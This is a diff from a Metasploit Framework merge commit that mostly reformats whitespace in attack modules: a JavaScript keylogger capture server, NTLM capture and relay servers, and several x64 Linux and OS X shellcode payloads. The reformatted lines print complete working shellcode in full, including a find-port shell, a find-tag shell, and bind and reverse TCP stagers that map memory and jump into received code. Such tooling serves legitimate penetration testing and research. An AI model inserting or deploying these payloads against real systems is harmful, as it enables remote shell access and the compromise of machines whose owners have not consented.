Merge branch 'msftidy_police' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-msftidy_police

jvazquez-r7 · jvazquez-r7 · commit 291ad27a6943 · 2012-10-18T11:32:55.000+02:00
diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb
@@ -182,8 +182,8 @@ def process_data(cli, request, cid, data)
 			print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
 		end
 
-		::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
-		::File.open( @client_cache[cid][:path_raw], "a")   { |fd| fd.write(real) }
+		::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
+		::File.open( @client_cache[cid][:path_raw], "ab")   { |fd| fd.write(real) }
 
 		if nice.length > 0
 			print_good("[#{cid}] Keys: #{nice}")
diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb
@@ -67,7 +67,7 @@ def initialize(info = {})
 
 	def on_request_uri(cli, request)
 		print_status("Request '#{request.uri}'...")
-		
+
 		case request.method
 		when 'OPTIONS'
 			process_options(cli, request)
@@ -101,7 +101,7 @@ def run
 		end
 		exploit()
 	end
-	
+
 	def process_options(cli, request)
 		print_status("OPTIONS #{request.uri}")
 		headers = {
diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb
@@ -93,7 +93,7 @@ def initialize(info = {})
 
 	# Handles the initial requests waiting for the browser to try NTLM auth
 	def on_request_uri(cli, request)
-	
+
 		case request.method
 		when 'OPTIONS'
 			process_options(cli, request)
@@ -136,7 +136,7 @@ def run
 		parse_args()
 		exploit()
 	end
-	
+
 	def process_options(cli, request)
 		print_status("OPTIONS #{request.uri}")
 		headers = {
diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb
@@ -38,50 +38,50 @@ def initialize(info = {})
 							'CPORT' => [ 32, 'n' ],
 						},
 
-                                        'Assembly' => <<EOS
-       xor rdi,rdi
-       xor rbx,rbx
-       mov bl,0x14
-       sub rsp,rbx
-       lea rdx,[rsp]
-       lea rsi,[rsp+4]
-find_port:
-       push 0x34     ; getpeername
-       pop rax
-       syscall
-       inc rdi
-       cmp word [rsi+2],0x4142
-       jne find_port
-       dec rdi
-       push 2
-       pop rsi
-dup2:
-       push 0x21     ; dup2
-       pop rax
-       syscall
-       dec rsi
-       jns dup2
-       mov rbx,rsi
-       mov ebx, 0x68732f41
-       mov eax,0x6e69622f
-       shr rbx,8
-       shl rbx,32
-       or  rax,rbx
-       push rax
-       mov rdi,rsp
-       xor rsi,rsi
-       mov rdx,rsi
-       push 0x3b     ; execve
-       pop rax
-       syscall
-EOS
+					'Assembly' => %Q|
+						xor rdi,rdi
+						xor rbx,rbx
+						mov bl,0x14
+						sub rsp,rbx
+						lea rdx,[rsp]
+						lea rsi,[rsp+4]
+					find_port:
+						push 0x34     ; getpeername
+						pop rax
+						syscall
+						inc rdi
+						cmp word [rsi+2],0x4142
+						jne find_port
+						dec rdi
+						push 2
+						pop rsi
+					dup2:
+						push 0x21     ; dup2
+						pop rax
+						syscall
+						dec rsi
+						jns dup2
+						mov rbx,rsi
+						mov ebx, 0x68732f41
+						mov eax,0x6e69622f
+						shr rbx,8
+						shl rbx,32
+						or  rax,rbx
+						push rax
+						mov rdi,rsp
+						xor rsi,rsi
+						mov rdx,rsi
+						push 0x3b     ; execve
+						pop rax
+						syscall
+					|
 				}
 			))
 	end
 
-        def size
-           return 91
-        end
+	def size
+		return 91
+	end
 
 
 end
diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb
@@ -38,10 +38,10 @@ def generate
 		payload =
 			"\x48\x31\xC0" +                    # xor rax,rax
 			"\xB8\x3B\x00\x00\x02" +            # mov eax,0x200003b
-			call + 
-			"/usr/bin/say\x00" + 
+			call +
+			"/usr/bin/say\x00" +
 			say +
-			"\x48\x8B\x3C\x24" +                # mov rdi,[rsp] 
+			"\x48\x8B\x3C\x24" +                # mov rdi,[rsp]
 			"\x4C\x8D\x57\x0D" +                # lea r10,[rdi+0xd]
 			"\x48\x31\xD2" +                    # xor rdx,rdx
 			"\x52" +                            # push rdx
diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb
@@ -44,41 +44,41 @@ def generate
 		cmd  = (datastore['CMD'] || '') << "\x00"
 		call = "\xe8" + [cmd.length].pack('V')
 
-		payload = 
-			 "\x48\x31\xFF" +                    # xor rdi,rdi
-			 "\x57" +                            # push rdi
-			 "\x48\x89\xE6" +                    # mov rsi,rsp
-			 "\x6A\x04" +                        # push byte +0x4
-			 "\x5A" +                            # pop rdx
-			 "\x48\x8D\x4A\xFE" +                # lea rcx,[rdx-0x2]
-			 "\x4D\x31\xC0" +                    # xor r8,r8
-			 "\x4D\x31\xC9" +                    # xor r9,r9
-			 "\x48\xFF\xCF" +                    # dec rdi
-			 "\x48\xFF\xC7" +                    # inc rdi
-			 "\xB8\x1D\x00\x00\x02" +            # mov eax,0x200001d
-			 "\x0F\x05" +                        # loadall286
-			 "\x81\x3C\x24" +                    # cmp dword [rsp],0x4e454d4f
-			 datastore['TAG'] + 
-			 "\x75\xED" +                        # jnz 0x17
-			 "\x48\x31\xC9" +                    # xor rcx,rcx
-			 "\xB8\x1D\x00\x00\x02" +            # mov eax,0x200001d
-			 "\x0F\x05" +                        # loadall286
-			 "\xB8\x5A\x00\x00\x02" +            # mov eax,0x200005a
-			 "\x48\x31\xF6" +                    # xor rsi,rsi
-			 "\x0F\x05" +                        # loadall286
-			 "\xB8\x5A\x00\x00\x02" +            # mov eax,0x200005a
-			 "\x48\xFF\xC6" +                    # inc rsi
-			 "\x0F\x05" +                        # loadall286
-			 "\x48\x31\xC0" +                    # xor rax,rax
-			 "\xB8\x3B\x00\x00\x02" +            # mov eax,0x200003b
-			 call +
-			 cmd +
-			 "\x48\x8B\x3C\x24" +                # mov rdi,[rsp]
-			 "\x48\x31\xD2" +                    # xor rdx,rdx
-			 "\x52" +                            # push rdx
-			 "\x57" +                            # push rdi
-			 "\x48\x89\xE6" +                    # mov rsi,rsp
-			 "\x0F\x05"                          # loadall286
+		payload =
+			"\x48\x31\xFF" +                    # xor rdi,rdi
+			"\x57" +                            # push rdi
+			"\x48\x89\xE6" +                    # mov rsi,rsp
+			"\x6A\x04" +                        # push byte +0x4
+			"\x5A" +                            # pop rdx
+			"\x48\x8D\x4A\xFE" +                # lea rcx,[rdx-0x2]
+			"\x4D\x31\xC0" +                    # xor r8,r8
+			"\x4D\x31\xC9" +                    # xor r9,r9
+			"\x48\xFF\xCF" +                    # dec rdi
+			"\x48\xFF\xC7" +                    # inc rdi
+			"\xB8\x1D\x00\x00\x02" +            # mov eax,0x200001d
+			"\x0F\x05" +                        # loadall286
+			"\x81\x3C\x24" +                    # cmp dword [rsp],0x4e454d4f
+			datastore['TAG'] +
+			"\x75\xED" +                        # jnz 0x17
+			"\x48\x31\xC9" +                    # xor rcx,rcx
+			"\xB8\x1D\x00\x00\x02" +            # mov eax,0x200001d
+			"\x0F\x05" +                        # loadall286
+			"\xB8\x5A\x00\x00\x02" +            # mov eax,0x200005a
+			"\x48\x31\xF6" +                    # xor rsi,rsi
+			"\x0F\x05" +                        # loadall286
+			"\xB8\x5A\x00\x00\x02" +            # mov eax,0x200005a
+			"\x48\xFF\xC6" +                    # inc rsi
+			"\x0F\x05" +                        # loadall286
+			"\x48\x31\xC0" +                    # xor rax,rax
+			"\xB8\x3B\x00\x00\x02" +            # mov eax,0x200003b
+			call +
+			cmd +
+			"\x48\x8B\x3C\x24" +                # mov rdi,[rsp]
+			"\x48\x31\xD2" +                    # xor rdx,rdx
+			"\x52" +                            # push rdx
+			"\x57" +                            # push rdi
+			"\x48\x89\xE6" +                    # mov rsi,rsp
+			"\x0F\x05"                          # loadall286
 	end
 
 end
diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb
@@ -27,67 +27,67 @@ def initialize(info = { })
 			{
 				'Offsets' => { 'LPORT' => [ 31, 'n'] },
 				'Payload' =>
-					 "\xB8\x61\x00\x00\x02" +     # mov eax,0x2000061
-					 "\x6A\x02" +                 # push byte +0x2
-					 "\x5F" +                     # pop rdi
-					 "\x6A\x01" +                 # push byte +0x1
-					 "\x5E" +                     # pop rsi
-					 "\x48\x31\xD2" +             # xor rdx,rdx
-					 "\x0F\x05" +                 # loadall286
-					 "\x48\x89\xC7" +             # mov rdi,rax
-					 "\xB8\x68\x00\x00\x02" +     # mov eax,0x2000068
-					 "\x48\x31\xF6" +             # xor rsi,rsi
-					 "\x56" +                     # push rsi
-					 "\xBE\x00\x02\x15\xB3" +     # mov esi,0xb3150200
-					 "\x56" +                     # push rsi
-					 "\x48\x89\xE6" +             # mov rsi,rsp
-					 "\x6A\x10" +                 # push byte +0x10
-					 "\x5A" +                     # pop rdx
-					 "\x0F\x05" +                 # loadall286
-					 "\xB8\x6A\x00\x00\x02" +     # mov eax,0x200006a
-					 "\x48\x31\xF6" +             # xor rsi,rsi
-					 "\x48\xFF\xC6" +             # inc rsi
-					 "\x49\x89\xFC" +             # mov r12,rdi
-					 "\x0F\x05" +                 # loadall286
-					 "\xB8\x1E\x00\x00\x02" +     # mov eax,0x200001e
-					 "\x4C\x89\xE7" +             # mov rdi,r12
-					 "\x48\x89\xE6" +             # mov rsi,rsp
-					 "\x48\x89\xE2" +             # mov rdx,rsp
-					 "\x48\x83\xEA\x04" +         # sub rdx,byte +0x4
-					 "\x0F\x05" +                 # loadall286
-					 "\x49\x89\xC5" +             # mov r13,rax
-					 "\x48\x89\xC7" +             # mov rdi,rax
-					 "\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
-					 "\x48\x31\xC9" +             # xor rcx,rcx
-					 "\x51" +                     # push rcx
-					 "\x48\x89\xE6" +             # mov rsi,rsp
-					 "\xBA\x04\x00\x00\x00" +     # mov edx,0x4
-					 "\x4D\x31\xC0" +             # xor r8,r8
-					 "\x4D\x31\xD2" +             # xor r10,r10
-					 "\x0F\x05" +                 # loadall286
-					 "\x41\x5B" +                 # pop r11
-					 "\x4C\x89\xDE" +             # mov rsi,r11
-					 "\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
-					 "\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
-					 "\xB8\xC5\x00\x00\x02" +     # mov eax,0x20000c5
-					 "\x48\x31\xFF" +             # xor rdi,rdi
-					 "\x48\xFF\xCF" +             # dec rdi
-					 "\xBA\x07\x00\x00\x00" +     # mov edx,0x7
-					 "\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
-					 "\x49\x89\xF8" +             # mov r8,rdi
-					 "\x4D\x31\xC9" +             # xor r9,r9
-					 "\x0F\x05" +                 # loadall286
-					 "\x48\x89\xC6" +             # mov rsi,rax
-					 "\x56" +                     # push rsi
-					 "\x4C\x89\xEF" +             # mov rdi,r13
-					 "\x48\x31\xC9" +             # xor rcx,rcx
-					 "\x4C\x89\xDA" +             # mov rdx,r11
-					 "\x4D\x31\xC0" +             # xor r8,r8
-					 "\x4D\x31\xD2" +             # xor r10,r10
-					 "\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
-					 "\x0F\x05" +                 # loadall286
-					 "\x58" +                     # pop rax
-					 "\xFF\xD0"                   # call rax
+					"\xB8\x61\x00\x00\x02" +     # mov eax,0x2000061
+					"\x6A\x02" +                 # push byte +0x2
+					"\x5F" +                     # pop rdi
+					"\x6A\x01" +                 # push byte +0x1
+					"\x5E" +                     # pop rsi
+					"\x48\x31\xD2" +             # xor rdx,rdx
+					"\x0F\x05" +                 # loadall286
+					"\x48\x89\xC7" +             # mov rdi,rax
+					"\xB8\x68\x00\x00\x02" +     # mov eax,0x2000068
+					"\x48\x31\xF6" +             # xor rsi,rsi
+					"\x56" +                     # push rsi
+					"\xBE\x00\x02\x15\xB3" +     # mov esi,0xb3150200
+					"\x56" +                     # push rsi
+					"\x48\x89\xE6" +             # mov rsi,rsp
+					"\x6A\x10" +                 # push byte +0x10
+					"\x5A" +                     # pop rdx
+					"\x0F\x05" +                 # loadall286
+					"\xB8\x6A\x00\x00\x02" +     # mov eax,0x200006a
+					"\x48\x31\xF6" +             # xor rsi,rsi
+					"\x48\xFF\xC6" +             # inc rsi
+					"\x49\x89\xFC" +             # mov r12,rdi
+					"\x0F\x05" +                 # loadall286
+					"\xB8\x1E\x00\x00\x02" +     # mov eax,0x200001e
+					"\x4C\x89\xE7" +             # mov rdi,r12
+					"\x48\x89\xE6" +             # mov rsi,rsp
+					"\x48\x89\xE2" +             # mov rdx,rsp
+					"\x48\x83\xEA\x04" +         # sub rdx,byte +0x4
+					"\x0F\x05" +                 # loadall286
+					"\x49\x89\xC5" +             # mov r13,rax
+					"\x48\x89\xC7" +             # mov rdi,rax
+					"\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
+					"\x48\x31\xC9" +             # xor rcx,rcx
+					"\x51" +                     # push rcx
+					"\x48\x89\xE6" +             # mov rsi,rsp
+					"\xBA\x04\x00\x00\x00" +     # mov edx,0x4
+					"\x4D\x31\xC0" +             # xor r8,r8
+					"\x4D\x31\xD2" +             # xor r10,r10
+					"\x0F\x05" +                 # loadall286
+					"\x41\x5B" +                 # pop r11
+					"\x4C\x89\xDE" +             # mov rsi,r11
+					"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
+					"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
+					"\xB8\xC5\x00\x00\x02" +     # mov eax,0x20000c5
+					"\x48\x31\xFF" +             # xor rdi,rdi
+					"\x48\xFF\xCF" +             # dec rdi
+					"\xBA\x07\x00\x00\x00" +     # mov edx,0x7
+					"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
+					"\x49\x89\xF8" +             # mov r8,rdi
+					"\x4D\x31\xC9" +             # xor r9,r9
+					"\x0F\x05" +                 # loadall286
+					"\x48\x89\xC6" +             # mov rsi,rax
+					"\x56" +                     # push rsi
+					"\x4C\x89\xEF" +             # mov rdi,r13
+					"\x48\x31\xC9" +             # xor rcx,rcx
+					"\x4C\x89\xDA" +             # mov rdx,r11
+					"\x4D\x31\xC0" +             # xor r8,r8
+					"\x4D\x31\xD2" +             # xor r10,r10
+					"\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
+					"\x0F\x05" +                 # loadall286
+					"\x58" +                     # pop rax
+					"\xFF\xD0"                   # call rax
 			}
 		))
 	end
diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
@@ -31,19 +31,19 @@ def initialize(info = { })
 					'LPORT' => [ 35, 'n']
 				},
 				'Payload' =>
-					"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" + 
-					"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" + 
-					"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" + 
-					"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" + 
-					"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" + 
-					"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" + 
-					"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" + 
-					"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" + 
-					"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" + 
-					"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" + 
-					"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" + 
-					"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" + 
-					"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0" 
+					"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
+					"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
+					"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
+					"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
+					"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
+					"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
+					"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
+					"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
+					"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
+					"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
+					"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
+					"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
+					"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
 			}
 		))
 	end
diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb
diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb
